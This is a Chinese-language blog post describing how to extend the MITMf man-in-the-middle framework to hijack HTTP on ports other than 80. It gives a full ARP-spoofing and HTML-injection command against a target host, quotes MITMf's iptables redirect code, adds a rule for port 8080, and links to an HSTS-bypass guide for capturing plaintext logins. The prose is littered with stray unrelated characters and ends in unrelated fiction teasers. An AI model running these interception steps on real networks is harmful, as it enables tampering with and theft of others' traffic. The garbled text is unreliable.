使用MITMF中間人攻擊非80端口的HTTP

說明

MITMf 是一款可拓展性很高的中間人攻擊框架咙崎,基于代理工具sergio-proxy修改而來滤港。

問題

在實(shí)際使用中,發(fā)現(xiàn)一個問題悠抹,無法劫持修改非80端口 HTTP數(shù)據(jù),例如注入js 替換字符串扩淀。
例如注入一段js

sudo  python mitmf.py  -i wlan0 --spoof --arp --target  172.18.219.3 --gateway  172.18.219.1  --inject --html-payload '<script>alert(0)</script>'

victim 訪問
http://yaseng.org/project

image

訪問非80端口的http web
http://www.jcr.cacrnet.org.cn:8080/mmxb/CN/volumn/home.shtml
無任何提示

image

attack 端

img

解決

簡單看了一下代碼
MITMf/core/utils.py line:84

    def HTTP(self, http_redir_port):
        log.debug("Setting iptables HTTP redirection rule from port 80 to {}".format(http_redir_port))
        os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port {}'.format(http_redir_port))

iptables 把80端口的mitmf 監(jiān)聽的10000端口楔敌,很顯然,需要劫持哪個端口驻谆,加一條規(guī)則就行了卵凑。
例如

sudo  iptables -t nat -A PREROUTING -p tcp --destination-port 8080 -j REDIRECT --to-port  10000

attack

[圖片上傳失敗...(image-2d1ef3-1532176786357)]
victim


image

更多

使用mitmf 來繞過HSTS站點(diǎn)抓取登陸明文 http://yaseng.org/hsts-bypass-with-mitmf.html

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末,一起剝皮案震驚了整個濱河市胜臊,隨后出現(xiàn)的幾起案子勺卢,更是在濱河造成了極大的恐慌,老刑警劉巖象对,帶你破解...
    沈念sama閱讀 216,544評論 6 501
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件黑忱,死亡現(xiàn)場離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)杨何,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,430評論 3 392
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門酱塔,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人危虱,你說我怎么就攤上這事羊娃。” “怎么了埃跷?”我有些...
    開封第一講書人閱讀 162,764評論 0 353
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵蕊玷,是天一觀的道長。 經(jīng)常有香客問我弥雹,道長垃帅,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,193評論 1 292
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任剪勿,我火速辦了婚禮贸诚,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘厕吉。我一直安慰自己酱固,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,216評論 6 388
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布头朱。 她就那樣靜靜地躺著运悲,像睡著了一般。 火紅的嫁衣襯著肌膚如雪项钮。 梳的紋絲不亂的頭發(fā)上班眯,一...
    開封第一講書人閱讀 51,182評論 1 299
  • 城市分裂傳說
    那天,我揣著相機(jī)與錄音烁巫,去河邊找鬼署隘。 笑死,一個胖子當(dāng)著我的面吹牛亚隙,可吹牛的內(nèi)容都是我干的定踱。 我是一名探鬼主播,決...
    沈念sama閱讀 40,063評論 3 418
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼恃鞋,長吁一口氣:“原來是場噩夢啊……” “哼崖媚!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起恤浪,我...
    開封第一講書人閱讀 38,917評論 0 274
  • 萬榮殺人案實(shí)錄
    序言:老撾萬榮一對情侶失蹤畅哑,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后水由,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體荠呐,經(jīng)...
    沈念sama閱讀 45,329評論 1 310
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,543評論 2 332
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了泥张。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片呵恢。...
    茶點(diǎn)故事閱讀 39,722評論 1 348
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖媚创,靈堂內(nèi)的尸體忽然破棺而出渗钉,到底是詐尸還是另有隱情,我是刑警寧澤钞钙,帶...
    沈念sama閱讀 35,425評論 5 343
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布鳄橘,位于F島的核電站,受9級特大地震影響芒炼,放射性物質(zhì)發(fā)生泄漏瘫怜。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,019評論 3 326
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一本刽、第九天 我趴在偏房一處隱蔽的房頂上張望鲸湃。 院中可真熱鬧,春花似錦子寓、人聲如沸暗挑。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,671評論 0 22
  • 一樁弒父案别瞭,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至株憾,卻和暖如春蝙寨,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背嗤瞎。 一陣腳步聲響...
    開封第一講書人閱讀 32,825評論 1 269
  • 情欲美人皮
    我被黑心中介騙來泰國打工墙歪, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人贝奇。 一個月前我還...
    沈念sama閱讀 47,729評論 2 368
  • 代替公主和親
    正文 我出身青樓虹菲,卻偏偏與公主長得像,于是被迫代替她去往敵國和親掉瞳。 傳聞我的和親對象是個殘疾皇子毕源,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,614評論 2 353

推薦閱讀更多精彩內(nèi)容